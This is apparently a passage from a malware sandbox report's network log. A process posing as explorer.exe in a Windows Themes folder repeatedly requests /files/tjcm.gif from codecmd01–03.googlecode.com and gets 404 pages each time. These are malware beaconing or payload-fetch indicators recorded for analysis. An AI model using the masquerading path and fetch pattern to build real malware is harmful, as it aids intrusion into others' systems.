                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:41.978563070 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 56808 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:42.341242075 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:43.117152929 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:42 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:43.117178917 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Jan 13, 2025 13:18:43.117218018 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 56814 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:43.506222010 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:44.221028090 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:44 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:44.221074104 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.4 | 56820 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:44.554227114 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:45.259762049 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:45 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:45.259799004 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
59          192.168.2.4  56831        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:45.926723003 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:46.647850037 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:46 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:46.647919893 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.4  56837        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:47.004930973 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:47.730988979 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:47 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:47.731026888 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
61          192.168.2.4  56846        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:48.430083990 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:49.145817995 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:49 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:49.145833969 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
62          192.168.2.4  56852        64.233.167.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:49.473437071 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:50.208429098 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:50 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:50.208477020 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
63          192.168.2.4  56855        66.102.1.82     80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:51.059859037 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:51.747670889 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:51 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:51.747725964 CET  494  IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
64          192.168.2.4  56856        74.125.133.82   80                7540  C:\Windows\Resources\Themes\explorer.exe
Timestamp  Bytes transferred  Direction  Data
Jan 13, 2025 13:18:52.143656969 CET  215  OUT  GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:52.827589989 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:52 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:52.827655077 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.4 | 56857 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:53.266840935 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:53.986639023 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:53 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:53.986659050 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.4 | 56858 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:54.366554022 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:55.071510077 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:54 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:55.071530104 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.4 | 56859 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:55.344947100 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd02.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:56.056495905 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:55 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:56.056545019 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 56860 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:56.679346085 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd03.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:57.383725882 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:57 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:57.383753061 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
